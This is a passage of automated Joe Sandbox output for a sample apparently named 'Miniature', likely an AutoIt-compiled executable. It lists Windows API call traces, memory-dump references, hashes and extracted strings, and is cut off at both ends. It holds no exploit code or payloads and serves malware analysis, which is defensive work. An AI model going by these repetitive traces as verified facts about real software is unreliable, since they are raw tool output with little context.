                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00FCBFE7
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F91AA7,00000000,?,?,00F91EBE,?,?), ref: 00FCC018
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F91AA7,00000000,?,?,00F91EBE,?,?), ref: 00FCC02F
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F91AA7,00000000,?,?,00F91EBE,?,?), ref: 00FCC04B
                                                  • DeleteObject.GDI32(00000000), ref: 00FCC05D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                  • String ID:
                                                  • API String ID: 641708696-0
                                                  • Opcode ID: 92bb34014e9ebcf9eef1186d6262fcf2c65e01a73afd4e9e4b9c6c83874806dd
                                                  • Instruction ID: b34abf4403658e68d71a93c4c338d15855326551470f4c41cfa96f04da889f0b
                                                  • Opcode Fuzzy Hash: 92bb34014e9ebcf9eef1186d6262fcf2c65e01a73afd4e9e4b9c6c83874806dd
                                                  • Instruction Fuzzy Hash: DA61AE31941701EFEB75DF18D949B3A77B1FB40322F94852DE48686A58C37AA881FF90
                                                  APIs
                                                    • Part of subcall function 00F929AB: GetWindowLongW.USER32(?,000000EB), ref: 00F929BC
                                                  • GetSysColor.USER32(0000000F), ref: 00F925AF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ColorLongWindow
                                                  • String ID:
                                                  • API String ID: 259745315-0
                                                  • Opcode ID: d5b532139496eeea554c1fcafd5a9fafb73bd334d3552c2afb7dd7cbb4187d45
                                                  • Instruction ID: 5e665aa5e267d9592ad47c768d6db3b384f8c2e87e6af599e41f76f6c50e5c9b
                                                  • Opcode Fuzzy Hash: d5b532139496eeea554c1fcafd5a9fafb73bd334d3552c2afb7dd7cbb4187d45
                                                  • Instruction Fuzzy Hash: C841B231400244BFEF715F289888BB93B66FB0A331F294265FDA58A1DAD7358C41FB61
                                                  APIs
                                                    • Part of subcall function 00FB0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FA2A3E,?,00008000), ref: 00FB0BA7
                                                    • Part of subcall function 00FB0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA2A58,?,00008000), ref: 00FB02A4
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FA2ADF
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00FA2C2C
                                                    • Part of subcall function 00FA3EBE: _wcscpy.LIBCMT ref: 00FA3EF6
                                                    • Part of subcall function 00FB386D: _iswctype.LIBCMT ref: 00FB3875
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                  • API String ID: 537147316-3738523708
                                                  • Opcode ID: 5cea8e9ceb405dcb74e8ffb3d8e81bd4603bb7ff3f8f1291a0b2b0c8f3709577
                                                  • Instruction ID: 78c70c957f36335c4d73ff0f895be4c78be234d5992fc9d931963008a622b258
                                                  • Opcode Fuzzy Hash: 5cea8e9ceb405dcb74e8ffb3d8e81bd4603bb7ff3f8f1291a0b2b0c8f3709577
                                                  • Instruction Fuzzy Hash: 0C02C3715083419FC724EF24C881EAFBBE5BF86364F04491EF496972A1DB34D949EB42
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,01020980), ref: 00FFAF4E
                                                  • GetDriveTypeW.KERNEL32(00000061,0104B5F0,00000061), ref: 00FFB018
                                                  • _wcscpy.LIBCMT ref: 00FFB042
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                  • API String ID: 2820617543-1000479233
                                                  • Opcode ID: 798f0ea90164fe8bad9ca2795b0ee1b6a047a877178d86cd773581a077214515
                                                  • Instruction ID: 429d830acfdc2b9773927b56779cac8855ce96ee5e5a6c3422f5d2b5f01cf5bf
                                                  • Opcode Fuzzy Hash: 798f0ea90164fe8bad9ca2795b0ee1b6a047a877178d86cd773581a077214515
                                                  • Instruction Fuzzy Hash: 3451BEB15083099BC710EF24CC91AABB7A5FF94314F10481DF6955B2E2EF35ED09EA92
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: __i64tow__itow__swprintf
                                                  • String ID: %.15g$0x%p$False$True
                                                  • API String ID: 421087845-2263619337
                                                  • Opcode ID: df6692fb47b986df14be0194059ffca114deb499c377fa29a75fe26e48a1d0a6
                                                  • Instruction ID: 58d2bcdc6bf752bea1a3e0bb596a8744bf41c8a5f471b9edcbff2d8394726e49
                                                  • Opcode Fuzzy Hash: df6692fb47b986df14be0194059ffca114deb499c377fa29a75fe26e48a1d0a6
                                                  • Instruction Fuzzy Hash: 1C41E976E04209AFEB34DF74DD42F7A73E8EB45310F20446EE149D7292EA35E902AB10
                                                  APIs
                                                  • _memset.LIBCMT ref: 0101778F
                                                  • CreateMenu.USER32 ref: 010177AA
                                                  • SetMenu.USER32(?,00000000), ref: 010177B9
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01017846
                                                  • IsMenu.USER32(?), ref: 0101785C
                                                  • CreatePopupMenu.USER32 ref: 01017866
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01017893
                                                  • DrawMenuBar.USER32 ref: 0101789B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                  • String ID: 0$F
                                                  • API String ID: 176399719-3044882817
                                                  • Opcode ID: dec918598bf11735ab21d5c17bf5c898df4f68dc89b306f8c489dff6e8e9939a
                                                  • Instruction ID: 18ef9505a45ab20f22f8af7c95e3654d7463b3ab7d96fc45168489bac03c0456
                                                  • Opcode Fuzzy Hash: dec918598bf11735ab21d5c17bf5c898df4f68dc89b306f8c489dff6e8e9939a
                                                  • Instruction Fuzzy Hash: E3412874A00209EFEB20DF68D884AAABBF5FF49310F144469FD85A7359D739A910DF50
                                                  APIs
                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 01017B83
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 01017B8A
                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01017B9D
                                                  • SelectObject.GDI32(00000000,00000000), ref: 01017BA5
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 01017BB0
                                                  • DeleteDC.GDI32(00000000), ref: 01017BB9
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 01017BC3
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 01017BD7
                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 01017BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                  • String ID: static
                                                  • API String ID: 2559357485-2160076837
                                                  • Opcode ID: 7cf85650a001cc223fc823863d85172eb3b156fd6aa6dfc0761259c19e268d50
                                                  • Instruction ID: e90dcf5ab06b24698128b16c854d01b1ebcd34c17a4054f5113ad75c51e5af4f
                                                  • Opcode Fuzzy Hash: 7cf85650a001cc223fc823863d85172eb3b156fd6aa6dfc0761259c19e268d50
                                                  • Instruction Fuzzy Hash: 87316F32100219ABEF329F64DC88FDB3B69FF09720F200215FA9596198C73AD850DBA4
                                                  APIs
                                                  • _memset.LIBCMT ref: 00FB706B
                                                    • Part of subcall function 00FB8D58: __getptd_noexit.LIBCMT ref: 00FB8D58
                                                  • __gmtime64_s.LIBCMT ref: 00FB7104
                                                  • __gmtime64_s.LIBCMT ref: 00FB713A
                                                  • __gmtime64_s.LIBCMT ref: 00FB7157
                                                  • __allrem.LIBCMT ref: 00FB71AD
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB71C9
                                                  • __allrem.LIBCMT ref: 00FB71E0
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB71FE
                                                  • __allrem.LIBCMT ref: 00FB7215
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB7233
                                                  • __invoke_watson.LIBCMT ref: 00FB72A4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                  • String ID:
                                                  • API String ID: 384356119-0
                                                  • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                  • Instruction ID: 78db3d2cc836221fc9cc2700ac64a420f9695ea09473328d51f5618c4b5d863b
                                                  • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                  • Instruction Fuzzy Hash: 3C71E871E04717ABD714BE7ACC82BDAB3B8AF90360F14422AF514E7281E774D940AF90
                                                  APIs
                                                  • _memset.LIBCMT ref: 00FF2CE9
                                                  • GetMenuItemInfoW.USER32(01057890,000000FF,00000000,00000030), ref: 00FF2D4A
                                                  • SetMenuItemInfoW.USER32(01057890,00000004,00000000,00000030), ref: 00FF2D80
                                                  • Sleep.KERNEL32(000001F4), ref: 00FF2D92
                                                  • GetMenuItemCount.USER32(?), ref: 00FF2DD6
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00FF2DF2
                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00FF2E1C
                                                  • GetMenuItemID.USER32(?,?), ref: 00FF2E61
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FF2EA7
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF2EBB
                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF2EDC
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                  • String ID:
                                                  • API String ID: 4176008265-0
                                                  • Opcode ID: adfa3fc0f37e594288a7bd6a061b31233f88e58b378a5b9952f736b8d7cb1c5b
                                                  • Instruction ID: 5d4572a2f89353391711087d430efcd59b31270615279de033347f4fc864816d
                                                  • Opcode Fuzzy Hash: adfa3fc0f37e594288a7bd6a061b31233f88e58b378a5b9952f736b8d7cb1c5b
                                                  • Instruction Fuzzy Hash: 2A619DB190034DAFDB61CF64C888ABFBBB8EF41314F240059FA41A7265D776AD05EB21
                                                  APIs
                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 010175CA
                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 010175CD
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 010175F1
                                                  • _memset.LIBCMT ref: 01017602
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01017614
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0101768C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$LongWindow_memset
                                                  • String ID:
                                                  • API String ID: 830647256-0
                                                  • Opcode ID: f041f0630858f15d0f43ea8bedaf3d4d840523266f70a5c0c0530a121624f4d6
                                                  • Instruction ID: 6198c8a0a61e04233a0592c88dbb343886b8dfcbfb84240b4bdc7e812fa3fbee
                                                  • Opcode Fuzzy Hash: f041f0630858f15d0f43ea8bedaf3d4d840523266f70a5c0c0530a121624f4d6
                                                  • Instruction Fuzzy Hash: A5616A75900208AFDB21DFA8CC81EEE77F8FB09710F100199FA95A7291D779AE45DB60
                                                  APIs
                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FE77DD
                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00FE7836
                                                  • VariantInit.OLEAUT32(?), ref: 00FE7848
                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FE7868
                                                  • VariantCopy.OLEAUT32(?,?), ref: 00FE78BB
                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FE78CF
                                                  • VariantClear.OLEAUT32(?), ref: 00FE78E4
                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00FE78F1
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FE78FA
                                                  • VariantClear.OLEAUT32(?), ref: 00FE790C
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FE7917
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                  • String ID:
                                                  • API String ID: 2706829360-0
                                                  • Opcode ID: 5d6aa8d669619fa7bdc3e144166177827b37fbd07535843937440b896d206ed2
                                                  • Instruction ID: 9646fd356407b8808206dfde3759bfb38ac03d124eaece3bb35ec87be8c0656b
                                                  • Opcode Fuzzy Hash: 5d6aa8d669619fa7bdc3e144166177827b37fbd07535843937440b896d206ed2
                                                  • Instruction Fuzzy Hash: C9418E75A002199FDB10EFA5C8489ADBBB8FF18310F10C069F855A7255CB35AA46DFA0
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 00FF0530
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00FF05B1
                                                  • GetKeyState.USER32(000000A0), ref: 00FF05CC
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00FF05E6
                                                  • GetKeyState.USER32(000000A1), ref: 00FF05FB
                                                  • GetAsyncKeyState.USER32(00000011), ref: 00FF0613
                                                  • GetKeyState.USER32(00000011), ref: 00FF0625
                                                  • GetAsyncKeyState.USER32(00000012), ref: 00FF063D
                                                  • GetKeyState.USER32(00000012), ref: 00FF064F
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00FF0667
                                                  • GetKeyState.USER32(0000005B), ref: 00FF0679
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: 9ec224f65744febdc9ef7bb5ef771fc3fb5682fafe5851e54c9460d546c720a1
                                                  • Instruction ID: 76bd31658f640cb23505c19d2376d75ea570b9ddb1e281a3234a097e334c39ef
                                                  • Opcode Fuzzy Hash: 9ec224f65744febdc9ef7bb5ef771fc3fb5682fafe5851e54c9460d546c720a1
                                                  • Instruction Fuzzy Hash: 3F41C530D047CE6DFF308A6484047B6BEA06F51324F0C4059D7C5866D3EEE899D89B96
                                                  APIs
                                                    • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                    • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                  • CoInitialize.OLE32 ref: 01008AED
                                                  • CoUninitialize.OLE32 ref: 01008AF8
                                                  • CoCreateInstance.OLE32(?,00000000,00000017,01023BBC,?), ref: 01008B58
                                                  • IIDFromString.OLE32(?,?), ref: 01008BCB
                                                  • VariantInit.OLEAUT32(?), ref: 01008C65
                                                  • VariantClear.OLEAUT32(?), ref: 01008CC6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                  • API String ID: 834269672-1287834457
                                                  • Opcode ID: 4581a976866018e5751c96dddfaf71ba58366a3f0ddb97439d77135e5ecf31bf
                                                  • Instruction ID: 75a9c35cf223767900b853f128354a24ab5220b0a37fb13da11f62ab898daac3
                                                  • Opcode Fuzzy Hash: 4581a976866018e5751c96dddfaf71ba58366a3f0ddb97439d77135e5ecf31bf
                                                  • Instruction Fuzzy Hash: EF619F70A047059FE722DF54C884E6EBBE8BF84714F00885EF9C59B291D774E944CB92
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00FFBB13
                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FFBB89
                                                  • GetLastError.KERNEL32 ref: 00FFBB93
                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00FFBC00
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                  • API String ID: 4194297153-14809454
                                                  • Opcode ID: 4b6138a81f37c2d03e5e9dd92d97c38f9e9ffbfd9f29d3848ee1775a3ff0cdfd
                                                  • Instruction ID: 7b6295e2a907a0156b43aa186bf69af7c5e716d92374f46f0f20298454b0963b
                                                  • Opcode Fuzzy Hash: 4b6138a81f37c2d03e5e9dd92d97c38f9e9ffbfd9f29d3848ee1775a3ff0cdfd
                                                  • Instruction Fuzzy Hash: 5E31C335A0020DAFCB10EF69C885EB9B7B4FF84314F14806AEB05D72A5DB759901EB50
                                                  APIs
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                    • Part of subcall function 00FEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00FEB7BD
                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FE9BCC
                                                  • GetDlgCtrlID.USER32 ref: 00FE9BD7
                                                  • GetParent.USER32 ref: 00FE9BF3
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FE9BF6
                                                  • GetDlgCtrlID.USER32(?), ref: 00FE9BFF
                                                  • GetParent.USER32(?), ref: 00FE9C1B
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FE9C1E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
